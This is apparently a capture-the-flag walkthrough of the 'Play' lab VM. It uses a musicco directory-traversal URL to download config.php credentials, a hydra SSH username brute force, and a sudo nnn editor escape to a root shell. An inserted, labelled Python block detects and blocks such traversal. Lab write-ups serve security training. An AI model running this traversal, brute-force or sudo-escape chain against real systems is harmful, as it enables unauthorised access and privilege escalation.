# Lab setup
Download: Play
NAT, IP: 192.168.1.134
# Penetration process
# Initial information gathering
```text
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
```
Directory scanning turns up a playlist directory.
There are no real functional points there, so scan that directory again and find a README.
It reveals that the CMS is musicco. A quick search for vulnerabilities turns up an arbitrary file download.
Do a directory traversal: http://192.168.1.134/playlist//?getAlbum&parent=../../&album=Efe
This downloads an archive.
Three sets of credentials are found in config.php:
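As an added example (not from the original write-up or from musicco itself), here is the root-containment check that a getAlbum-style download handler needs, alongside a scan of constructed Apache access-log lines for requests whose parent/album parameters escape the music root; the install path and the log lines are assumptions.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit

# Assumed install path of the musicRoot directory (not taken from the page).
MUSIC_ROOT = "/var/www/html/playlist/music"

# Constructed sample access-log lines: one benign request, two traversal
# attempts (plain and percent-encoded), one benign sub-folder request.
SAMPLE_LOG = """\
192.168.1.10 - - [22/May/2024:03:30:01 +0000] "GET /playlist/?getAlbum&parent=Rock&album=Efe HTTP/1.1" 200 5120
192.168.1.50 - - [22/May/2024:03:31:07 +0000] "GET /playlist//?getAlbum&parent=../../&album=Efe HTTP/1.1" 200 40960
192.168.1.50 - - [22/May/2024:03:31:09 +0000] "GET /playlist/?getAlbum&parent=..%2F..%2F..&album=x HTTP/1.1" 200 2048
192.168.1.10 - - [22/May/2024:03:32:00 +0000] "GET /playlist/?getAlbum&parent=Rock/Live&album=Efe HTTP/1.1" 200 3000
"""

# Apache combined-log prefix: client IP, then the request line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def resolves_inside_root(root, parent, album):
    """Hardened containment check: join the user-controlled parent/album to
    the configured root, normalise away '..' segments, and require that the
    result is the root itself or lies strictly below it. An absolute
    'parent' (e.g. '/etc') makes os.path.join discard the root, which this
    check also rejects."""
    root = os.path.normpath(root)
    target = os.path.normpath(os.path.join(root, parent, album))
    return target == root or target.startswith(root + os.sep)


def find_traversal_attempts(log_text, root=MUSIC_ROOT):
    """Scan access-log lines for getAlbum downloads whose parent/album would
    escape the music root. Returns (client_ip, request_target) tuples."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # keep_blank_values keeps the bare 'getAlbum' key; parse_qs also
        # percent-decodes, so '..%2F..' is compared in its decoded form.
        qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "getAlbum" not in qs:
            continue
        parent = qs.get("parent", [""])[0]
        album = qs.get("album", [""])[0]
        if not resolves_inside_root(root, parent, album):
            hits.append((client, target))
    return hits


if __name__ == "__main__":
    for client, target in find_traversal_attempts(SAMPLE_LOG):
        print(f"traversal attempt from {client}: {target}")
```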
```php
<?php
$_CONFIG['saveConfig'] = '';
$_CONFIG['users'] = array(
    array('admin', 'admin', 'true'),
    array('guest', 'guest', 'false'),
    array('unknown', 'iL0v3Mu$1c', 'false'),
);
$_CONFIG['lang'] = 'en';
$_CONFIG['musicRoot'] = 'music';
$_CONFIG['coverFileName'] = 'folder';
$_CONFIG['coverExtension'] = '.png';
$_CONFIG['loadLyricsFromFile'] = 'on';
$_CONFIG['lookUpLyrics'] = 'on';
$_CONFIG['downLoadMissingCovers'] = 'on';
$_CONFIG['searchEngine'] = '';
$_CONFIG['imageSearchEngine'] = '';
?>
```
The last password is iL0v3Mu$1c, and with an "unknown" username that means one thing: brute-force the username against SSH.
Bring out hydra!
```text
┌──(root㉿kali)-[~/Desktop/html/playlist]
└─# hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -p 'iL0v3Mu$1c' 192.168.1.134 ssh -t 64 -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-22 03:36:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 10177 login tries (l:10177/p:1), ~160 tries per task
[DATA] attacking ssh://192.168.1.134:22/
[STATUS] 475.00 tries/min, 475 tries in 00:01h, 9743 to do in 00:21h, 23 active
[22][ssh] host: 192.168.1.134   login: andy   password: iL0v3Mu$1c
[STATUS] 335.00 tries/min, 1005 tries in 00:03h, 9225 to do in 00:28h, 11 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
```
Got the user andy.
# Privilege escalation
```shell
sudo -l
```
There is an nnn entry.
No idea what it is. Opened it, mashed keys at random, and found that pressing e opens an editor that looks like vi.
Just run :!/bin/bash
Got root.